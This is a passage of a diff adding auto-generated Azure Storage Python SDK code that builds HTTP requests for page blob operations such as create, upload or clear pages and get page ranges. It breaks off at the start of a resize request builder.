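+# assumptions):
+#
+#     from azure.storage.blob import BlobClient
+#
+#     blob = BlobClient.from_connection_string(conn_str, "vhds", "disk.vhd")
+#     blob.create_page_blob(size=512 * 1024)  # size maps to x-ms-blob-content-length
+#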
+# -------------------------------------------------------------------------- +import datetime +from typing import TYPE_CHECKING + +from msrest import Serializer + +from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error +from azure.core.pipeline import PipelineResponse +from azure.core.pipeline.transport import HttpResponse +from azure.core.rest import HttpRequest +from azure.core.tracing.decorator import distributed_trace + +from .. import models as _models +from .._vendor import _convert_request, _format_url_section + +if TYPE_CHECKING: + # pylint: disable=unused-import,ungrouped-imports + from typing import Any, Callable, Dict, IO, Optional, TypeVar, Union + T = TypeVar('T') + ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]] + +_SERIALIZER = Serializer() +_SERIALIZER.client_side_validation = False +# fmt: off + +def build_create_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) -> HttpRequest + blob_type = kwargs.pop('blob_type', "PageBlob") # type: str + version = kwargs.pop('version', "2021-04-10") # type: str + content_length = kwargs.pop('content_length') # type: int + blob_content_length = kwargs.pop('blob_content_length') # type: int + timeout = kwargs.pop('timeout', None) # type: Optional[int] + tier = kwargs.pop('tier', None) # type: Optional[Union[str, "_models.PremiumPageBlobAccessTier"]] + blob_content_type = kwargs.pop('blob_content_type', None) # type: Optional[str] + blob_content_encoding = kwargs.pop('blob_content_encoding', None) # type: Optional[str] + blob_content_language = kwargs.pop('blob_content_language', None) # type: Optional[str] + blob_content_md5 = kwargs.pop('blob_content_md5', None) # type: Optional[bytearray] + blob_cache_control = kwargs.pop('blob_cache_control', None) # type: Optional[str] + metadata = kwargs.pop('metadata', None) # type: Optional[Dict[str, str]] + lease_id = kwargs.pop('lease_id', None) # type: Optional[str] + blob_content_disposition = kwargs.pop('blob_content_disposition', None) # type: Optional[str] + encryption_key = kwargs.pop('encryption_key', None) # type: Optional[str] + encryption_key_sha256 = kwargs.pop('encryption_key_sha256', None) # type: Optional[str] + encryption_algorithm = kwargs.pop('encryption_algorithm', None) # type: Optional[Union[str, "_models.EncryptionAlgorithmType"]] + encryption_scope = kwargs.pop('encryption_scope', None) # type: Optional[str] + if_modified_since = kwargs.pop('if_modified_since', None) # type: Optional[datetime.datetime] + if_unmodified_since = kwargs.pop('if_unmodified_since', None) # type: Optional[datetime.datetime] + if_match = kwargs.pop('if_match', None) # type: Optional[str] + if_none_match = kwargs.pop('if_none_match', None) # type: Optional[str] + if_tags = kwargs.pop('if_tags', None) # type: Optional[str] + blob_sequence_number = kwargs.pop('blob_sequence_number', 0) # type: Optional[int] + request_id_parameter = kwargs.pop('request_id_parameter', None) # type: Optional[str] + blob_tags_string = kwargs.pop('blob_tags_string', None) # type: Optional[str] + immutability_policy_expiry = kwargs.pop('immutability_policy_expiry', None) # type: Optional[datetime.datetime] + immutability_policy_mode = kwargs.pop('immutability_policy_mode', None) # type: Optional[Union[str, "_models.BlobImmutabilityPolicyMode"]] + legal_hold = kwargs.pop('legal_hold', None) # type: Optional[bool] + + accept = "application/xml" + # Construct URL + _url = 
kwargs.pop("template_url", "{url}/{containerName}/{blob}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + if timeout is not None: + _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0) + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + _header_parameters['x-ms-blob-type'] = _SERIALIZER.header("blob_type", blob_type, 'str') + _header_parameters['Content-Length'] = _SERIALIZER.header("content_length", content_length, 'long') + if tier is not None: + _header_parameters['x-ms-access-tier'] = _SERIALIZER.header("tier", tier, 'str') + if blob_content_type is not None: + _header_parameters['x-ms-blob-content-type'] = _SERIALIZER.header("blob_content_type", blob_content_type, 'str') + if blob_content_encoding is not None: + _header_parameters['x-ms-blob-content-encoding'] = _SERIALIZER.header("blob_content_encoding", blob_content_encoding, 'str') + if blob_content_language is not None: + _header_parameters['x-ms-blob-content-language'] = _SERIALIZER.header("blob_content_language", blob_content_language, 'str') + if blob_content_md5 is not None: + _header_parameters['x-ms-blob-content-md5'] = _SERIALIZER.header("blob_content_md5", blob_content_md5, 'bytearray') + if blob_cache_control is not None: + _header_parameters['x-ms-blob-cache-control'] = _SERIALIZER.header("blob_cache_control", blob_cache_control, 'str') + if metadata is not None: + _header_parameters['x-ms-meta'] = _SERIALIZER.header("metadata", metadata, '{str}') + if lease_id is not None: + _header_parameters['x-ms-lease-id'] = _SERIALIZER.header("lease_id", lease_id, 'str') + if blob_content_disposition is not None: + _header_parameters['x-ms-blob-content-disposition'] = _SERIALIZER.header("blob_content_disposition", blob_content_disposition, 'str') + if encryption_key is not None: + _header_parameters['x-ms-encryption-key'] = _SERIALIZER.header("encryption_key", encryption_key, 'str') + if encryption_key_sha256 is not None: + _header_parameters['x-ms-encryption-key-sha256'] = _SERIALIZER.header("encryption_key_sha256", encryption_key_sha256, 'str') + if encryption_algorithm is not None: + _header_parameters['x-ms-encryption-algorithm'] = _SERIALIZER.header("encryption_algorithm", encryption_algorithm, 'str') + if encryption_scope is not None: + _header_parameters['x-ms-encryption-scope'] = _SERIALIZER.header("encryption_scope", encryption_scope, 'str') + if if_modified_since is not None: + _header_parameters['If-Modified-Since'] = _SERIALIZER.header("if_modified_since", if_modified_since, 'rfc-1123') + if if_unmodified_since is not None: + _header_parameters['If-Unmodified-Since'] = _SERIALIZER.header("if_unmodified_since", if_unmodified_since, 'rfc-1123') + if if_match is not None: + _header_parameters['If-Match'] = _SERIALIZER.header("if_match", if_match, 'str') + if if_none_match is not None: + _header_parameters['If-None-Match'] = _SERIALIZER.header("if_none_match", if_none_match, 'str') + if if_tags is not None: + _header_parameters['x-ms-if-tags'] = _SERIALIZER.header("if_tags", if_tags, 'str') + _header_parameters['x-ms-blob-content-length'] = _SERIALIZER.header("blob_content_length", blob_content_length, 'long') + if blob_sequence_number is not None: + _header_parameters['x-ms-blob-sequence-number'] = _SERIALIZER.header("blob_sequence_number", 
blob_sequence_number, 'long') + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + if request_id_parameter is not None: + _header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("request_id_parameter", request_id_parameter, 'str') + if blob_tags_string is not None: + _header_parameters['x-ms-tags'] = _SERIALIZER.header("blob_tags_string", blob_tags_string, 'str') + if immutability_policy_expiry is not None: + _header_parameters['x-ms-immutability-policy-until-date'] = _SERIALIZER.header("immutability_policy_expiry", immutability_policy_expiry, 'rfc-1123') + if immutability_policy_mode is not None: + _header_parameters['x-ms-immutability-policy-mode'] = _SERIALIZER.header("immutability_policy_mode", immutability_policy_mode, 'str') + if legal_hold is not None: + _header_parameters['x-ms-legal-hold'] = _SERIALIZER.header("legal_hold", legal_hold, 'bool') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="PUT", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + + +def build_upload_pages_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) -> HttpRequest + comp = kwargs.pop('comp', "page") # type: str + page_write = kwargs.pop('page_write', "update") # type: str + version = kwargs.pop('version', "2021-04-10") # type: str + content_type = kwargs.pop('content_type', None) # type: Optional[str] + content_length = kwargs.pop('content_length') # type: int + transactional_content_md5 = kwargs.pop('transactional_content_md5', None) # type: Optional[bytearray] + transactional_content_crc64 = kwargs.pop('transactional_content_crc64', None) # type: Optional[bytearray] + timeout = kwargs.pop('timeout', None) # type: Optional[int] + range = kwargs.pop('range', None) # type: Optional[str] + lease_id = kwargs.pop('lease_id', None) # type: Optional[str] + encryption_key = kwargs.pop('encryption_key', None) # type: Optional[str] + encryption_key_sha256 = kwargs.pop('encryption_key_sha256', None) # type: Optional[str] + encryption_algorithm = kwargs.pop('encryption_algorithm', None) # type: Optional[Union[str, "_models.EncryptionAlgorithmType"]] + encryption_scope = kwargs.pop('encryption_scope', None) # type: Optional[str] + if_sequence_number_less_than_or_equal_to = kwargs.pop('if_sequence_number_less_than_or_equal_to', None) # type: Optional[int] + if_sequence_number_less_than = kwargs.pop('if_sequence_number_less_than', None) # type: Optional[int] + if_sequence_number_equal_to = kwargs.pop('if_sequence_number_equal_to', None) # type: Optional[int] + if_modified_since = kwargs.pop('if_modified_since', None) # type: Optional[datetime.datetime] + if_unmodified_since = kwargs.pop('if_unmodified_since', None) # type: Optional[datetime.datetime] + if_match = kwargs.pop('if_match', None) # type: Optional[str] + if_none_match = kwargs.pop('if_none_match', None) # type: Optional[str] + if_tags = kwargs.pop('if_tags', None) # type: Optional[str] + request_id_parameter = kwargs.pop('request_id_parameter', None) # type: Optional[str] + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}/{containerName}/{blob}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + _query_parameters['comp'] = _SERIALIZER.query("comp", comp, 
'str') + if timeout is not None: + _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0) + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + _header_parameters['x-ms-page-write'] = _SERIALIZER.header("page_write", page_write, 'str') + _header_parameters['Content-Length'] = _SERIALIZER.header("content_length", content_length, 'long') + if transactional_content_md5 is not None: + _header_parameters['Content-MD5'] = _SERIALIZER.header("transactional_content_md5", transactional_content_md5, 'bytearray') + if transactional_content_crc64 is not None: + _header_parameters['x-ms-content-crc64'] = _SERIALIZER.header("transactional_content_crc64", transactional_content_crc64, 'bytearray') + if range is not None: + _header_parameters['x-ms-range'] = _SERIALIZER.header("range", range, 'str') + if lease_id is not None: + _header_parameters['x-ms-lease-id'] = _SERIALIZER.header("lease_id", lease_id, 'str') + if encryption_key is not None: + _header_parameters['x-ms-encryption-key'] = _SERIALIZER.header("encryption_key", encryption_key, 'str') + if encryption_key_sha256 is not None: + _header_parameters['x-ms-encryption-key-sha256'] = _SERIALIZER.header("encryption_key_sha256", encryption_key_sha256, 'str') + if encryption_algorithm is not None: + _header_parameters['x-ms-encryption-algorithm'] = _SERIALIZER.header("encryption_algorithm", encryption_algorithm, 'str') + if encryption_scope is not None: + _header_parameters['x-ms-encryption-scope'] = _SERIALIZER.header("encryption_scope", encryption_scope, 'str') + if if_sequence_number_less_than_or_equal_to is not None: + _header_parameters['x-ms-if-sequence-number-le'] = _SERIALIZER.header("if_sequence_number_less_than_or_equal_to", if_sequence_number_less_than_or_equal_to, 'long') + if if_sequence_number_less_than is not None: + _header_parameters['x-ms-if-sequence-number-lt'] = _SERIALIZER.header("if_sequence_number_less_than", if_sequence_number_less_than, 'long') + if if_sequence_number_equal_to is not None: + _header_parameters['x-ms-if-sequence-number-eq'] = _SERIALIZER.header("if_sequence_number_equal_to", if_sequence_number_equal_to, 'long') + if if_modified_since is not None: + _header_parameters['If-Modified-Since'] = _SERIALIZER.header("if_modified_since", if_modified_since, 'rfc-1123') + if if_unmodified_since is not None: + _header_parameters['If-Unmodified-Since'] = _SERIALIZER.header("if_unmodified_since", if_unmodified_since, 'rfc-1123') + if if_match is not None: + _header_parameters['If-Match'] = _SERIALIZER.header("if_match", if_match, 'str') + if if_none_match is not None: + _header_parameters['If-None-Match'] = _SERIALIZER.header("if_none_match", if_none_match, 'str') + if if_tags is not None: + _header_parameters['x-ms-if-tags'] = _SERIALIZER.header("if_tags", if_tags, 'str') + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + if request_id_parameter is not None: + _header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("request_id_parameter", request_id_parameter, 'str') + if content_type is not None: + _header_parameters['Content-Type'] = _SERIALIZER.header("content_type", content_type, 'str') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="PUT", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + + +def build_clear_pages_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) 
-> HttpRequest + comp = kwargs.pop('comp', "page") # type: str + page_write = kwargs.pop('page_write', "clear") # type: str + version = kwargs.pop('version', "2021-04-10") # type: str + content_length = kwargs.pop('content_length') # type: int + timeout = kwargs.pop('timeout', None) # type: Optional[int] + range = kwargs.pop('range', None) # type: Optional[str] + lease_id = kwargs.pop('lease_id', None) # type: Optional[str] + encryption_key = kwargs.pop('encryption_key', None) # type: Optional[str] + encryption_key_sha256 = kwargs.pop('encryption_key_sha256', None) # type: Optional[str] + encryption_algorithm = kwargs.pop('encryption_algorithm', None) # type: Optional[Union[str, "_models.EncryptionAlgorithmType"]] + encryption_scope = kwargs.pop('encryption_scope', None) # type: Optional[str] + if_sequence_number_less_than_or_equal_to = kwargs.pop('if_sequence_number_less_than_or_equal_to', None) # type: Optional[int] + if_sequence_number_less_than = kwargs.pop('if_sequence_number_less_than', None) # type: Optional[int] + if_sequence_number_equal_to = kwargs.pop('if_sequence_number_equal_to', None) # type: Optional[int] + if_modified_since = kwargs.pop('if_modified_since', None) # type: Optional[datetime.datetime] + if_unmodified_since = kwargs.pop('if_unmodified_since', None) # type: Optional[datetime.datetime] + if_match = kwargs.pop('if_match', None) # type: Optional[str] + if_none_match = kwargs.pop('if_none_match', None) # type: Optional[str] + if_tags = kwargs.pop('if_tags', None) # type: Optional[str] + request_id_parameter = kwargs.pop('request_id_parameter', None) # type: Optional[str] + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}/{containerName}/{blob}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + _query_parameters['comp'] = _SERIALIZER.query("comp", comp, 'str') + if timeout is not None: + _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0) + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + _header_parameters['x-ms-page-write'] = _SERIALIZER.header("page_write", page_write, 'str') + _header_parameters['Content-Length'] = _SERIALIZER.header("content_length", content_length, 'long') + if range is not None: + _header_parameters['x-ms-range'] = _SERIALIZER.header("range", range, 'str') + if lease_id is not None: + _header_parameters['x-ms-lease-id'] = _SERIALIZER.header("lease_id", lease_id, 'str') + if encryption_key is not None: + _header_parameters['x-ms-encryption-key'] = _SERIALIZER.header("encryption_key", encryption_key, 'str') + if encryption_key_sha256 is not None: + _header_parameters['x-ms-encryption-key-sha256'] = _SERIALIZER.header("encryption_key_sha256", encryption_key_sha256, 'str') + if encryption_algorithm is not None: + _header_parameters['x-ms-encryption-algorithm'] = _SERIALIZER.header("encryption_algorithm", encryption_algorithm, 'str') + if encryption_scope is not None: + _header_parameters['x-ms-encryption-scope'] = _SERIALIZER.header("encryption_scope", encryption_scope, 'str') + if if_sequence_number_less_than_or_equal_to is not None: + _header_parameters['x-ms-if-sequence-number-le'] = _SERIALIZER.header("if_sequence_number_less_than_or_equal_to", if_sequence_number_less_than_or_equal_to, 'long') + if 
if_sequence_number_less_than is not None: + _header_parameters['x-ms-if-sequence-number-lt'] = _SERIALIZER.header("if_sequence_number_less_than", if_sequence_number_less_than, 'long') + if if_sequence_number_equal_to is not None: + _header_parameters['x-ms-if-sequence-number-eq'] = _SERIALIZER.header("if_sequence_number_equal_to", if_sequence_number_equal_to, 'long') + if if_modified_since is not None: + _header_parameters['If-Modified-Since'] = _SERIALIZER.header("if_modified_since", if_modified_since, 'rfc-1123') + if if_unmodified_since is not None: + _header_parameters['If-Unmodified-Since'] = _SERIALIZER.header("if_unmodified_since", if_unmodified_since, 'rfc-1123') + if if_match is not None: + _header_parameters['If-Match'] = _SERIALIZER.header("if_match", if_match, 'str') + if if_none_match is not None: + _header_parameters['If-None-Match'] = _SERIALIZER.header("if_none_match", if_none_match, 'str') + if if_tags is not None: + _header_parameters['x-ms-if-tags'] = _SERIALIZER.header("if_tags", if_tags, 'str') + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + if request_id_parameter is not None: + _header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("request_id_parameter", request_id_parameter, 'str') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="PUT", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + + +def build_upload_pages_from_url_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) -> HttpRequest + comp = kwargs.pop('comp', "page") # type: str + page_write = kwargs.pop('page_write', "update") # type: str + version = kwargs.pop('version', "2021-04-10") # type: str + source_url = kwargs.pop('source_url') # type: str + source_range = kwargs.pop('source_range') # type: str + content_length = kwargs.pop('content_length') # type: int + range = kwargs.pop('range') # type: str + source_content_md5 = kwargs.pop('source_content_md5', None) # type: Optional[bytearray] + source_contentcrc64 = kwargs.pop('source_contentcrc64', None) # type: Optional[bytearray] + timeout = kwargs.pop('timeout', None) # type: Optional[int] + encryption_key = kwargs.pop('encryption_key', None) # type: Optional[str] + encryption_key_sha256 = kwargs.pop('encryption_key_sha256', None) # type: Optional[str] + encryption_algorithm = kwargs.pop('encryption_algorithm', None) # type: Optional[Union[str, "_models.EncryptionAlgorithmType"]] + encryption_scope = kwargs.pop('encryption_scope', None) # type: Optional[str] + lease_id = kwargs.pop('lease_id', None) # type: Optional[str] + if_sequence_number_less_than_or_equal_to = kwargs.pop('if_sequence_number_less_than_or_equal_to', None) # type: Optional[int] + if_sequence_number_less_than = kwargs.pop('if_sequence_number_less_than', None) # type: Optional[int] + if_sequence_number_equal_to = kwargs.pop('if_sequence_number_equal_to', None) # type: Optional[int] + if_modified_since = kwargs.pop('if_modified_since', None) # type: Optional[datetime.datetime] + if_unmodified_since = kwargs.pop('if_unmodified_since', None) # type: Optional[datetime.datetime] + if_match = kwargs.pop('if_match', None) # type: Optional[str] + if_none_match = kwargs.pop('if_none_match', None) # type: Optional[str] + if_tags = kwargs.pop('if_tags', None) # type: Optional[str] + source_if_modified_since = kwargs.pop('source_if_modified_since', None) # type: Optional[datetime.datetime] + source_if_unmodified_since = 
kwargs.pop('source_if_unmodified_since', None) # type: Optional[datetime.datetime] + source_if_match = kwargs.pop('source_if_match', None) # type: Optional[str] + source_if_none_match = kwargs.pop('source_if_none_match', None) # type: Optional[str] + request_id_parameter = kwargs.pop('request_id_parameter', None) # type: Optional[str] + copy_source_authorization = kwargs.pop('copy_source_authorization', None) # type: Optional[str] + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}/{containerName}/{blob}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + _query_parameters['comp'] = _SERIALIZER.query("comp", comp, 'str') + if timeout is not None: + _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0) + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + _header_parameters['x-ms-page-write'] = _SERIALIZER.header("page_write", page_write, 'str') + _header_parameters['x-ms-copy-source'] = _SERIALIZER.header("source_url", source_url, 'str') + _header_parameters['x-ms-source-range'] = _SERIALIZER.header("source_range", source_range, 'str') + if source_content_md5 is not None: + _header_parameters['x-ms-source-content-md5'] = _SERIALIZER.header("source_content_md5", source_content_md5, 'bytearray') + if source_contentcrc64 is not None: + _header_parameters['x-ms-source-content-crc64'] = _SERIALIZER.header("source_contentcrc64", source_contentcrc64, 'bytearray') + _header_parameters['Content-Length'] = _SERIALIZER.header("content_length", content_length, 'long') + _header_parameters['x-ms-range'] = _SERIALIZER.header("range", range, 'str') + if encryption_key is not None: + _header_parameters['x-ms-encryption-key'] = _SERIALIZER.header("encryption_key", encryption_key, 'str') + if encryption_key_sha256 is not None: + _header_parameters['x-ms-encryption-key-sha256'] = _SERIALIZER.header("encryption_key_sha256", encryption_key_sha256, 'str') + if encryption_algorithm is not None: + _header_parameters['x-ms-encryption-algorithm'] = _SERIALIZER.header("encryption_algorithm", encryption_algorithm, 'str') + if encryption_scope is not None: + _header_parameters['x-ms-encryption-scope'] = _SERIALIZER.header("encryption_scope", encryption_scope, 'str') + if lease_id is not None: + _header_parameters['x-ms-lease-id'] = _SERIALIZER.header("lease_id", lease_id, 'str') + if if_sequence_number_less_than_or_equal_to is not None: + _header_parameters['x-ms-if-sequence-number-le'] = _SERIALIZER.header("if_sequence_number_less_than_or_equal_to", if_sequence_number_less_than_or_equal_to, 'long') + if if_sequence_number_less_than is not None: + _header_parameters['x-ms-if-sequence-number-lt'] = _SERIALIZER.header("if_sequence_number_less_than", if_sequence_number_less_than, 'long') + if if_sequence_number_equal_to is not None: + _header_parameters['x-ms-if-sequence-number-eq'] = _SERIALIZER.header("if_sequence_number_equal_to", if_sequence_number_equal_to, 'long') + if if_modified_since is not None: + _header_parameters['If-Modified-Since'] = _SERIALIZER.header("if_modified_since", if_modified_since, 'rfc-1123') + if if_unmodified_since is not None: + _header_parameters['If-Unmodified-Since'] = _SERIALIZER.header("if_unmodified_since", if_unmodified_since, 'rfc-1123') + if if_match is not None: + 
_header_parameters['If-Match'] = _SERIALIZER.header("if_match", if_match, 'str') + if if_none_match is not None: + _header_parameters['If-None-Match'] = _SERIALIZER.header("if_none_match", if_none_match, 'str') + if if_tags is not None: + _header_parameters['x-ms-if-tags'] = _SERIALIZER.header("if_tags", if_tags, 'str') + if source_if_modified_since is not None: + _header_parameters['x-ms-source-if-modified-since'] = _SERIALIZER.header("source_if_modified_since", source_if_modified_since, 'rfc-1123') + if source_if_unmodified_since is not None: + _header_parameters['x-ms-source-if-unmodified-since'] = _SERIALIZER.header("source_if_unmodified_since", source_if_unmodified_since, 'rfc-1123') + if source_if_match is not None: + _header_parameters['x-ms-source-if-match'] = _SERIALIZER.header("source_if_match", source_if_match, 'str') + if source_if_none_match is not None: + _header_parameters['x-ms-source-if-none-match'] = _SERIALIZER.header("source_if_none_match", source_if_none_match, 'str') + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + if request_id_parameter is not None: + _header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("request_id_parameter", request_id_parameter, 'str') + if copy_source_authorization is not None: + _header_parameters['x-ms-copy-source-authorization'] = _SERIALIZER.header("copy_source_authorization", copy_source_authorization, 'str') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="PUT", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + + +def build_get_page_ranges_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) -> HttpRequest + comp = kwargs.pop('comp', "pagelist") # type: str + version = kwargs.pop('version', "2021-04-10") # type: str + snapshot = kwargs.pop('snapshot', None) # type: Optional[str] + timeout = kwargs.pop('timeout', None) # type: Optional[int] + range = kwargs.pop('range', None) # type: Optional[str] + lease_id = kwargs.pop('lease_id', None) # type: Optional[str] + if_modified_since = kwargs.pop('if_modified_since', None) # type: Optional[datetime.datetime] + if_unmodified_since = kwargs.pop('if_unmodified_since', None) # type: Optional[datetime.datetime] + if_match = kwargs.pop('if_match', None) # type: Optional[str] + if_none_match = kwargs.pop('if_none_match', None) # type: Optional[str] + if_tags = kwargs.pop('if_tags', None) # type: Optional[str] + request_id_parameter = kwargs.pop('request_id_parameter', None) # type: Optional[str] + marker = kwargs.pop('marker', None) # type: Optional[str] + maxresults = kwargs.pop('maxresults', None) # type: Optional[int] + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}/{containerName}/{blob}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + _query_parameters['comp'] = _SERIALIZER.query("comp", comp, 'str') + if snapshot is not None: + _query_parameters['snapshot'] = _SERIALIZER.query("snapshot", snapshot, 'str') + if timeout is not None: + _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0) + if marker is not None: + _query_parameters['marker'] = _SERIALIZER.query("marker", marker, 'str') + if maxresults is not None: + _query_parameters['maxresults'] = 
_SERIALIZER.query("maxresults", maxresults, 'int', minimum=1) + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + if range is not None: + _header_parameters['x-ms-range'] = _SERIALIZER.header("range", range, 'str') + if lease_id is not None: + _header_parameters['x-ms-lease-id'] = _SERIALIZER.header("lease_id", lease_id, 'str') + if if_modified_since is not None: + _header_parameters['If-Modified-Since'] = _SERIALIZER.header("if_modified_since", if_modified_since, 'rfc-1123') + if if_unmodified_since is not None: + _header_parameters['If-Unmodified-Since'] = _SERIALIZER.header("if_unmodified_since", if_unmodified_since, 'rfc-1123') + if if_match is not None: + _header_parameters['If-Match'] = _SERIALIZER.header("if_match", if_match, 'str') + if if_none_match is not None: + _header_parameters['If-None-Match'] = _SERIALIZER.header("if_none_match", if_none_match, 'str') + if if_tags is not None: + _header_parameters['x-ms-if-tags'] = _SERIALIZER.header("if_tags", if_tags, 'str') + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + if request_id_parameter is not None: + _header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("request_id_parameter", request_id_parameter, 'str') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="GET", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + + +def build_get_page_ranges_diff_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) -> HttpRequest + comp = kwargs.pop('comp', "pagelist") # type: str + version = kwargs.pop('version', "2021-04-10") # type: str + snapshot = kwargs.pop('snapshot', None) # type: Optional[str] + timeout = kwargs.pop('timeout', None) # type: Optional[int] + prevsnapshot = kwargs.pop('prevsnapshot', None) # type: Optional[str] + prev_snapshot_url = kwargs.pop('prev_snapshot_url', None) # type: Optional[str] + range = kwargs.pop('range', None) # type: Optional[str] + lease_id = kwargs.pop('lease_id', None) # type: Optional[str] + if_modified_since = kwargs.pop('if_modified_since', None) # type: Optional[datetime.datetime] + if_unmodified_since = kwargs.pop('if_unmodified_since', None) # type: Optional[datetime.datetime] + if_match = kwargs.pop('if_match', None) # type: Optional[str] + if_none_match = kwargs.pop('if_none_match', None) # type: Optional[str] + if_tags = kwargs.pop('if_tags', None) # type: Optional[str] + request_id_parameter = kwargs.pop('request_id_parameter', None) # type: Optional[str] + marker = kwargs.pop('marker', None) # type: Optional[str] + maxresults = kwargs.pop('maxresults', None) # type: Optional[int] + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}/{containerName}/{blob}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + _query_parameters['comp'] = _SERIALIZER.query("comp", comp, 'str') + if snapshot is not None: + _query_parameters['snapshot'] = _SERIALIZER.query("snapshot", snapshot, 'str') + if timeout is not None: + _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0) + if prevsnapshot is not None: + _query_parameters['prevsnapshot'] = _SERIALIZER.query("prevsnapshot", prevsnapshot, 'str') + if marker is not None: + 
_query_parameters['marker'] = _SERIALIZER.query("marker", marker, 'str') + if maxresults is not None: + _query_parameters['maxresults'] = _SERIALIZER.query("maxresults", maxresults, 'int', minimum=1) + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + if prev_snapshot_url is not None: + _header_parameters['x-ms-previous-snapshot-url'] = _SERIALIZER.header("prev_snapshot_url", prev_snapshot_url, 'str') + if range is not None: + _header_parameters['x-ms-range'] = _SERIALIZER.header("range", range, 'str') + if lease_id is not None: + _header_parameters['x-ms-lease-id'] = _SERIALIZER.header("lease_id", lease_id, 'str') + if if_modified_since is not None: + _header_parameters['If-Modified-Since'] = _SERIALIZER.header("if_modified_since", if_modified_since, 'rfc-1123') + if if_unmodified_since is not None: + _header_parameters['If-Unmodified-Since'] = _SERIALIZER.header("if_unmodified_since", if_unmodified_since, 'rfc-1123') + if if_match is not None: + _header_parameters['If-Match'] = _SERIALIZER.header("if_match", if_match, 'str') + if if_none_match is not None: + _header_parameters['If-None-Match'] = _SERIALIZER.header("if_none_match", if_none_match, 'str') + if if_tags is not None: + _header_parameters['x-ms-if-tags'] = _SERIALIZER.header("if_tags", if_tags, 'str') + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + if request_id_parameter is not None: + _header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("request_id_parameter", request_id_parameter, 'str') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="GET", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + + +def build_resize_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) 
